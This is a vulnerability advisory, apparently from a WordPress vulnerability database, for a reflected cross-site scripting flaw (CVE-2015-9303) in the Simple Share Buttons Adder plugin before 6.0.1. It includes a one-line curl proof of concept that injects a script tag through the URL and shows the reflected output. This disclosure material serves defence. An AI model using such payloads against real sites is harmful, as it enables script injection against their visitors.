WordPress Plugin Vulnerabilities

Simple Share Buttons Adder <= 6.0.0 - Reflected Cross-Site Scripting (XSS)

Description

A reflected XSS in "Simple Share Buttons Adder" before version 6.0.1 lead to a reflected cross-site scripting vulnerability on all pages where the "Simple Share Buttons Adder" was added (usually all blog posts).

Exploitation required that the browser did not encode the parameters sent to the server. Most prominently this thus affects Internet Explorer but is not exploitable on recent versions of Chrome or Firefox.

Proof of Concept

curl "http://output.com/index.php/2015/06/02/hello-world/?<script>alert(1)</script>" will result in:

<a class="ssba_google_share" href="https://plus.google.com/share?url=http://output.com/2015/06/02/hello-world?<script>alert(1)</script>"

Patch in ssba_current_url can be found at https://plugins.trac.wordpress.org/changeset/1172761/simple-share-buttons-adder/trunk

Affects Plugins

Plugin icon
simple-share-buttons-adder
Fixed in 6.0.1

References

CVE
CVE-2015-9303
URL
https://wordpress.org/plugins/simple-share-buttons-adder/

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Submitter
Lukas Reschke
Submitter website
https://www.owncloud.com
Verified
No
WPVDB ID
5c1c515f-7c0f-441b-abee-71fd4b457bf7

Timeline

Publicly Published
2015-06-02 (about 8 years ago)
Added
2015-06-02 (about 8 years ago)
Last Updated
2020-09-22 (about 3 years ago)

Other

Published
Title
Published
2023-06-19
Title
Multiple Plugins - Cross-Site Scripting From Third-party Library
Published
2023-04-18
Title
Panorama - WordPress Project Management < 1.5.1 - Admin+ Stored XSS
Published
2020-04-24
Title
YOP Poll < 6.1.5 - Authenticated Stored XSS
Published
2023-10-16
Title
Lava Directory Manager <= 1.1.34 - Unauthenticated Stored XSS
Published
2022-05-30
Title
Newsletter < 7.4.6 - Admin+ Stored Cross-Site Scripting